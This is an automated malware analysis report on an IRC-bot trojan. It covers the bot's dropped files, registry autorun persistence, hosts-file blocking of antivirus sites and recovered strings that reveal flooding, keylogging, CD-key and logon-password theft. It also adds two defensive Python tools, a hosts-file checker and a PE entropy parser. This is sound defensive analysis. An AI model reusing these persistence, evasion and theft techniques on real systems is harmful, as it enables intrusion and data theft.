Gen.Heur.MSIL.Androm.3_49ee5b907e
HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Heur.MSIL.Androm.3 (B) (Emsisoft), Gen:Heur.MSIL.Androm.3 (AdAware), Rbot.YR, BackdoorIRC.YR, GenericIRCBot.YR (Lavasoft MAS)
Behaviour: Trojan, Backdoor, IRCBot
This description was generated automatically by the Lavasoft Malware Analysis System and may contain incomplete or inaccurate information.
MD5: 49ee5b907e4b4b9d5aa0669d261f996b
SHA1: 6a05c73f19c6866da64a7d10b8e8593b70d85688
SHA256: e59820f41e2938495b4241d0832a432c432a4eea7a0c8ab35ba7a4d8767398b3
SSDeep: 12288:xD/Q56oYjW4ftG9 4UWMqBOgxnZKE1Xvvgf5UjzX:xD/5oYK4Es4UWMqVxnZr4f5sX
Size: 979039 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: no certificate found
Created at: 2011-04-25 19:48:52
Analyzed on: WindowsXP SP3 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
| Behaviour | Description |
|---|---|
| IRCBot | A bot that communicates with its command-and-control server over an IRC channel. |
Process activity
The Trojan creates the following process(es):
%original file name%.exe:1756
eohpsgi.exe:1660
run.exe:1388
Uncrypted.exe:224
The Trojan injects its code into the following process(es):
LOIC.exe:1316
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process %original file name%.exe:1756 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\LOIC.exe (133 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Uncrypted.exe (3878 bytes)
%System%\drivers\etc\hosts (518 bytes)
The process eohpsgi.exe:1660 makes changes in the file system.
The Trojan deletes the following file(s):
No objects were found.
The process run.exe:1388 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KDYZG96R\desktop.ini (67 bytes)
%System%\eohpsgi.exe (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85IF8HAJ\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\7IQEU6O0\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LTNDDR8Y\desktop.ini (67 bytes)
The process Uncrypted.exe:224 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
No objects were found.
The Trojan deletes the following file(s):
No objects were found.
Registry activity
The process %original file name%.exe:1756 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "73 AA DB 59 AA 83 B2 0D E3 86 81 DE 94 73 5D 5E"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"uncrypted.exe" = "Uncrypted"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"LOIC.exe" = "Low Orbit Ion Cannon"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies the IE security-zone settings so that all network paths (UNCs) are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies the IE security-zone settings so that all local sites not listed in other zones are mapped to the Intranet Zone:
"IntranetName" = "1"
The Trojan modifies the IE security-zone settings so that all sites that bypass the proxy server are mapped to the Intranet Zone:
"ProxyBypass" = "1"
These three values set to "1" are Internet Explorer's default intranet-detection settings and are written whenever a process first initialises WinINet; like the RNG "Seed", "Shell Folders", "MountPoints2" and "MUICache" entries above, they are a side effect of execution rather than a deliberate change. The MUICache entries are still informative: they record the FileDescription of each dropped executable, which is how LOIC.exe is identified as "Low Orbit Ion Cannon".
The process eohpsgi.exe:1660 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A4 09 F4 E3 AE 09 AE E3 6C 56 4C 61 12 CC 83 A4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
To run automatically each time Windows boots, the Trojan adds the following values, pointing at its dropped file, to the registry autorun keys (the bare file name resolves because eohpsgi.exe was written to %System%):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Microsoft Update Machine" = "eohpsgi.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Runservices]
"Microsoft Update Machine" = "eohpsgi.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Microsoft Update Machine" = "eohpsgi.exe"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process LOIC.exe:1316 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "13 8D 73 0C C0 DB 47 C3 A5 75 11 7D 86 3A 9E 45"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process run.exe:1388 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2F F9 04 63 DA B1 E3 BA 55 2F 7F 5A BD 98 AA B1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
The process Uncrypted.exe:224 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3F 5D C0 A2 A7 B7 24 11 7A 37 DD C9 D1 2B C3 7E"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\D:]
"Run.exe" = "run"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The Trojan modifies the IE security-zone settings so that all sites that bypass the proxy server are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan modifies the IE security-zone settings so that all network paths (UNCs) are mapped to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies the IE security-zone settings so that all local sites not listed in other zones are mapped to the Intranet Zone:
"IntranetName" = "1"
These are Internet Explorer's default intranet-detection values and are written as a side effect of WinINet initialisation, not as a deliberate change by the Trojan.
Dropped PE files
| MD5 | File path |
|---|---|
| 9dbe2c1a0f3360af6a9e24b2b303113d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\LOIC.exe |
| 363307d3a54e1c2d1107b1f53e8844b1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Uncrypted.exe |
| 2e31f43c4028cf8520dca20a9cb8e55d | c:\WINDOWS\system32\eohpsgi.exe |
HOSTS file anomalies
The Trojan modifies the "%System%\drivers\etc\hosts" file, which maps host names to IP addresses and is consulted before any DNS query is made.
The modified file is 1122 bytes in size. The following entries were added to the hosts file; pointing these security-vendor and online-scanner domains at 127.0.0.1 blocks signature updates and web-based scanning from the infected host:
| 127.0.0.1 | virustotal.com |
| 127.0.0.1 | mcafee.com |
| 127.0.0.1 | avira.com |
| 127.0.0.1 | avast.com |
| 127.0.0.1 | symantec.com |
| 127.0.0.1 | clamwin.com |
| 127.0.0.1 | kaspersky.com |
| 127.0.0.1 | comodo.com |
| 127.0.0.1 | norton.com |
| 127.0.0.1 | avg.com |
| 127.0.0.1 | novirusthanks.org |
| 127.0.0.1 | virusscan.jotti.org |
| 127.0.0.1 | viruschief.com |
| 127.0.0.1 | fortiguard.com |
| 127.0.0.1 | bitdefender.com |
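Added example, not part of the Lavasoft report: a Python checker that applies the same test to a hosts file, flagging the watched domains from the table above when they are sinkholed (loopback or 0.0.0.0) or redirected elsewhere, and producing a cleaned copy for remediation. The hosts text embedded for the self-test is constructed from the entries in this table plus two benign lines; it is not the sample's 1122-byte file.

```python
import ipaddress
import sys

# Constructed hosts file for the self-test, modelled on the entries the report
# lists above (the real modified file was 1122 bytes; this is not that file).
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
127.0.0.1       localhost
::1             localhost
127.0.0.1 virustotal.com
127.0.0.1 mcafee.com
127.0.0.1 kaspersky.com
0.0.0.0 avast.com
127.0.0.1 virusscan.jotti.org
10.0.0.5 intranet.corp.example
198.51.100.7 symantec.com
"""

# Registrable domains from the report's hosts-file table (jotti.org covers
# virusscan.jotti.org); extend this set with whatever your estate depends on.
SECURITY_DOMAINS = {
    "virustotal.com", "mcafee.com", "avira.com", "avast.com", "symantec.com",
    "clamwin.com", "kaspersky.com", "comodo.com", "norton.com", "avg.com",
    "novirusthanks.org", "jotti.org", "viruschief.com", "fortiguard.com",
    "bitdefender.com",
}


def parse_hosts(text):
    """Yield (line_number, ip_address, [hostnames]) for every active entry.

    Comments (everything after '#'), blank lines and lines whose first token is
    not a valid IP address are skipped, as the resolver itself skips them.
    """
    for lineno, raw in enumerate(text.splitlines(), 1):
        parts = raw.split("#", 1)[0].split()
        if len(parts) < 2:
            continue
        try:
            ip = ipaddress.ip_address(parts[0])
        except ValueError:
            continue
        yield lineno, ip, [h.lower() for h in parts[1:]]


def is_watched(host):
    """True if host is a watched domain or any subdomain of one."""
    return any(host == d or host.endswith("." + d) for d in SECURITY_DOMAINS)


def find_hosts_anomalies(text):
    """Return [(line_number, ip, host, reason)] for watched domains that have
    been sinkholed (loopback / 0.0.0.0) or redirected to any other address."""
    findings = []
    for lineno, ip, hosts in parse_hosts(text):
        for host in hosts:
            if host == "localhost" or not is_watched(host):
                continue
            verb = "sinkholed" if ip.is_loopback or ip.is_unspecified else "redirected"
            findings.append((lineno, str(ip), host,
                             "security-vendor/scanner domain %s to %s" % (verb, ip)))
    return findings


def strip_anomalies(text):
    """Return the hosts text with every flagged line removed; the legitimate
    localhost and site-specific entries are kept."""
    bad = {f[0] for f in find_hosts_anomalies(text)}
    kept = [l for n, l in enumerate(text.splitlines(), 1) if n not in bad]
    return "\n".join(kept) + "\n"


if __name__ == "__main__":
    # e.g.  python hosts_check.py "C:\Windows\System32\drivers\etc\hosts"
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            text = fh.read()
    else:
        text = SAMPLE_HOSTS
    for lineno, ip, host, reason in find_hosts_anomalies(text):
        print("line %d: %-15s %-26s %s" % (lineno, ip, host, reason))
```

Run it against the live file to list the offending lines; `strip_anomalies` gives you the text to write back, which is safer than deleting the file outright because Windows expects the hosts file to exist. Remember that the file needs administrator rights to modify and that the resolver consults it before DNS, so a stale entry keeps blocking updates even after the malware itself is gone.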
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
Company Name:
Product Name:
Product Version: 0.0.0.0
Legal Copyright:
Legal Trademarks:
Original Filename: test-new1.exe
Internal Name: test-new1.exe
File Version: 0.0.0.0
File Description:
Comments:
Language: English (United States)
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 8192 | 963812 | 966656 | 5.0059 | e7c9c24e1ce22d4d81c0915e48e87b42 |
| .rsrc | 974848 | 680 | 4096 | 0.476044 | 89bbd7bcd3f28ac346308cdebc72b7f0 |
| .reloc | 983040 | 12 | 4096 | 0.011373 | b061c1f6fd5cfb56674648657757dc87 |
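The section table above can be reproduced from the file itself. The Python below is an added example, not a tool from the Lavasoft report: it parses the PE section headers, computes each section's Shannon entropy (the figure in the Entropy column) and applies an assumed 7.0 threshold as a "looks packed" heuristic. It self-tests on a constructed two-section image rather than the analysed sample. By that heuristic the .text section reported above (entropy 5.0059) would not be flagged, which is worth bearing in mind next to the "Entropy: Packed" verdict in the header.

```python
import math
import struct


def shannon_entropy(data):
    """Shannon entropy in bits per byte: 0.0 for empty or single-valued data,
    8.0 for a perfectly flat byte distribution. This is the table's measure."""
    entropy = 0.0
    if not data:
        return entropy
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    for c in counts:
        if c:
            p = c / n
            entropy -= p * math.log2(p)
    return entropy


def pe_sections(image):
    """Parse the section table of a PE image held in memory and return
    [(name, virtual_address, virtual_size, raw_size, entropy)], i.e. the
    columns of the report's PE Sections table (minus the section MD5)."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    file_header = e_lfanew + 4
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    _, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", image, file_header)
    table = file_header + 20 + opt_size
    sections = []
    for i in range(nsections):
        # IMAGE_SECTION_HEADER is 40 bytes; only its first five fields are needed here
        name, vsize, vaddr, raw_size, raw_ptr = struct.unpack_from("<8sIIII", image, table + 40 * i)
        data = image[raw_ptr:raw_ptr + raw_size]
        sections.append((name.rstrip(b"\0").decode("ascii", "replace"),
                         vaddr, vsize, raw_size, round(shannon_entropy(data), 4)))
    return sections


def looks_packed(sections, threshold=7.0):
    """Assumed heuristic: any section at or above the threshold is treated as
    compressed or encrypted. The .text row in the table above (5.0059) would
    not trip it."""
    return any(entropy >= threshold for *_, entropy in sections)


def build_sample_pe():
    """Constructed two-section PE32 image for the self-test. It is not the
    analysed sample and is not loadable (the optional header is zeroed)."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)       # e_lfanew: PE header at offset 0x40
    opt_size = 0xE0                              # size of a PE32 optional header
    file_header = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, opt_size, 0x102)
    text_data = bytes(range(256))                # every byte value once -> entropy 8.0
    rsrc_data = bytes(16)                        # all zero -> entropy 0.0
    headers = (struct.pack("<8sIIII", b".text", 0x100, 0x1000, len(text_data), 0x200) + bytes(16)
               + struct.pack("<8sIIII", b".rsrc", 0x10, 0x2000, len(rsrc_data), 0x300) + bytes(16))
    image = bytearray(dos + b"PE\0\0" + file_header + bytes(opt_size) + headers)
    image += bytes(0x200 - len(image))           # pad to .text's PointerToRawData
    image += text_data
    image += bytes(0x300 - len(image))           # pad to .rsrc's PointerToRawData
    image += rsrc_data
    return bytes(image)


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            data = fh.read()
    else:
        data = build_sample_pe()
    secs = pe_sections(data)
    for name, vaddr, vsize, raw, ent in secs:
        print("%-8s VA=0x%08x VSize=%-8d RawSize=%-8d Entropy=%.4f" % (name, vaddr, vsize, raw, ent))
    print("looks packed:", looks_packed(secs))
```

Note that a large, moderate-entropy .text section in a .NET executable (PEID reports NETexecutable above) is consistent with a managed binary that carries its payload as an embedded resource or byte array rather than with a conventional packer, so the strings dump later in this report, which comes from the dropped native components, is a better guide to what the sample actually is.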
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
No activity has been detected.
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
Web Traffic was not found.
The Trojan connects to the servers at the following location(s):
No server locations were recorded during this analysis. The lines that follow are strings recovered from the analysed sample and its dropped components; they are characteristic of an Rbot/rxBot-family IRC bot (port scanner, SYN/UDP/ICMP flooding, keylogger, CD-key harvesting, MSSQL and network-share spreading, rlogin/HTTP/TFTP/SOCKS4 servers). One hostname, bot.neverup.asia, appears among them, but no connection to it was observed.
.text
`.rdata
@.data
.idata
.reloc
Invalid allocation size: %u bytes.
Client hook allocation failure at file %hs line %d.
_CrtCheckMemory()
_CrtIsValidHeapPointer(pUserData)
Allocation too large or negative: %u bytes.
Client hook re-allocation failure at file %hs line %d.
DAMAGE: after %hs block (#%d) at 0xX.
DAMAGE: before %hs block (#%d) at 0xX.
memory check error at 0xX = 0xX, should be 0xX.
%hs located at 0xX is %u bytes long.
%hs allocated at file %hs(%d).
DAMAGE: on top of Free block at 0xX.
Bad memory block found at 0xX.
_CrtMemCheckPoint: NULL state pointer.
_CrtMemDifference: NULL state pointer.
crt block at 0xX, subtype %x, %u bytes long.
normal block at 0xX, %u bytes long.
client block at 0xX, subtype %x, %u bytes long.
%hs(%d) :
#File Error#(%d) :
Data: <%s> %s
%s(%d) : %s
_CrtDbgReport: String too long or IO Error
Second Chance Assertion Failed: File %s, Line %d
user32.dll
Debug %s!
Program: %s%s%s%s%s%s%s%s%s%s%s
__MSVCRT_HEAP_SELECT
portuguese-brazilian
ntpass
NTPass
mssql
MSSQL
%s: %d,
Total: %d in %s.
[SCAN]: Current IP: %s.
[TFTP]: Server started on Port: %d, File: %s, Request: %s.
[TFTP]: Failed to start server, error: <%d>.
[HTTPD]: Server listening on IP: %s:%d, Directory: %s\.
[HTTPD]: Failed to start server, error: <%d>.
%d.%d.%d.%d
sendto() socket failed. sent = %d <%d>.
[SCAN]: IP: %s:%d, Scan thread: %d, Sub-thread: %d.
[SCAN]: IP: %s, Port %d is open.
[SCAN]: %s:%d, Scan thread: %d, Sub-thread: %d.
[SCAN]: Failed to start worker thread, error: <%d>.
[SCAN]: Finished at %s:%d after %d minute(s) of scanning.
%d. %s = %s
[%.2d-%.2d-M %.2d:%.2d:%.2d] %s
CDKey
prvkey
Software\Microsoft\Windows\CurrentVersion
Microsoft Windows Product ID
Software\Electronic Arts\EA GAMES\Global Operations\ergc
Global Operations
Software\Electronic Arts\EA Sports\FIFA 2002\ergc
Software\Electronic Arts\EA Sports\FIFA 2003\ergc
Software\Electronic Arts\EA Sports\NHL 2002\ergc
Software\Electronic Arts\EA Sports\NHL 2003\ergc
Software\Electronic Arts\EA Sports\Nascar Racing 2002\ergc
Software\Electronic Arts\EA Sports\Nascar Racing 2003\ergc
Software\Techland\Chrome
Chrome
base\mp\sof2key
nwncdkey.ini
Key1=
Key2=
Key3=
%s\%s
%s CD Key: (%s).
DCC SEND %s %i %i %i
[DCC]: Transfer complete to IP: %s, Filename: %s (%s bytes).
[DCC]: Transfer complete from IP: %s, Filename: %s (%s bytes).
\\%s\pipe\epmapper
[TFTP]: File transfer complete to IP: %s
[%s]: Exploiting IP: %s.
w[TFTP]: File transfer complete to IP: %s
ddos.syn
ddos.ack
ddos.random
[DDoS]: Send error: <%d>.
[DOWNLOAD]: Couldn't open file: %s.
[DOWNLOAD]: File download: %s (%dKB transferred).
[DOWNLOAD]: Update: %s (%dKB transferred).
[DOWNLOAD]: Filesize is incorrect: (%d != %d).
[DOWNLOAD]: CRC Failed (%d != %d).
[DOWNLOAD]: Downloaded %.1f KB to %s @ %.1f KB/sec.
[DOWNLOAD]: Opened: %s.
[DOWNLOAD]: Downloaded %.1fKB to %s @ %.1fKB/sec. Updating.
[DOWNLOAD]: Update failed: Error executing file: %s.
[DOWNLOAD]: Bad URL, or DNS Error: %s.
[MAIN]: %s Drive (%s): Failed to stat, device not ready.
[MAIN]: %s Drive (%s): %s total, %s free, %s available.
[FINDFILE]: Searching for file: %s.
[FINDFILE]: Files found: %d.
Found: %s\%s
NTDLL.DLL
[FINDPASS]: The Windows logon (Pid: <%d>) information is: Domain: \\%S, User: (%S/(no password)).
[FINDPASS]: Unable to find the password in memory.
[FINDPASS]: Unable to find Winlogon Process ID.
[FINDPASS]: Failed to enable Debug Privilege.
[FINDPASS]: Only supported on Windows NT/2000.
MSGINA
[FINDPASS]: The Windows logon (Pid: <%d>) information is: Domain: \\%S, User: (%S/%S).
[FINDPASS]: The Windows logon (Pid: <%d>) information is: Domain: \\%S, User: (%S/(N/A)).
[HTTPD]: Error: server failed, returned: <%d>.
HTTP/1.0 200 OK
Content-Type: %s
Date: %s %s GMT
Last-Modified: %s %s GMT
Expires: %s %s GMT
[HTTPD]: Worker thread of server thread: %d.
[HTTPD]: Failed to start worker thread, error: <%d>.
PRIVMSG %s :Searching for: %s
<TITLE>Index of %s</TITLE>
<H1>Index of %s</H1>
<TD WIDTH="%d"><CODE>Name</CODE></TD>
<TD WIDTH="%d"><CODE>Last Modified</CODE></TD>
<TD WIDTH="%d" ALIGN="right"><CODE>Size</CODE></TD>
Searching for: %s
<TD COLSPAN="3"><A HREF="%s"><CODE>Parent Directory</CODE></A></TD>
%2.2d/%2.2d/M %2.2d:%2.2d %s
PRIVMSG %s :%-31s %-21s
<TD WIDTH="%d"><A HREF="
%s%s/
"><CODE>%s/</CODE></A>
<TD WIDTH="%d"><CODE>%s</CODE></TD>
<TD WIDTH="%d" ALIGN="right"><CODE>-</CODE></TD>
PRIVMSG %s :%-31s %-21s (%s bytes)
"><CODE>%s</CODE></A>
<TD WIDTH="%d" ALIGN="right"><CODE>%dk</CODE></TD>
PRIVMSG %s :Found %s Files and %s Directories
%s %s HTTP/1.1
Referer: %s
Host: %s
[ICMP]: Error: socket() failed, returned: <%d>.
[ICMP]: Error: setsockopt() failed, returned: <%d>.
[ICMP]: Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>.
[ICMP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).
[IDENTD]: Client connection from IP: %s:%d.
: USERID : UNIX : %s
[IDENTD]: Error: server failed, returned: <%d>.
PRIVMSG
%s %s :%s
[%d-%d-%d %d:%d:%d] %s
[KEYLOG]: %s
%s (Changed Windows: %s)
%s (Buffer full) (%s)
%s (Return) (%s)
kernel32.dll
ExitWindowsEx
GetAsyncKeyState
GetKeyState
advapi32.dll
RegOpenKeyExA
RegCreateKeyExA
RegCloseKey
gdi32.dll
ws2_32.dll
wininet.dll
HttpOpenRequestA
HttpSendRequestA
InternetOpenUrlA
InternetCrackUrlA
Mozilla/4.0 (compatible)
icmp.dll
netapi32.dll
dnsapi.dll
iphlpapi.dll
mpr.dll
shell32.dll
ShellExecuteA
odbc32.dll
SQLDriverConnect
SQLSetEnvAttr
SQLExecDirect
SQLAllocHandle
SQLFreeHandle
SQLDisconnect
avicap32.dll
Kernel32.dll failed. <%d>
User32.dll failed. <%d>
Advapi32.dll failed. <%d>
Gdi32.dll failed. <%d>
Ws2_32.dll failed. <%d>
Wininet.dll failed. <%d>
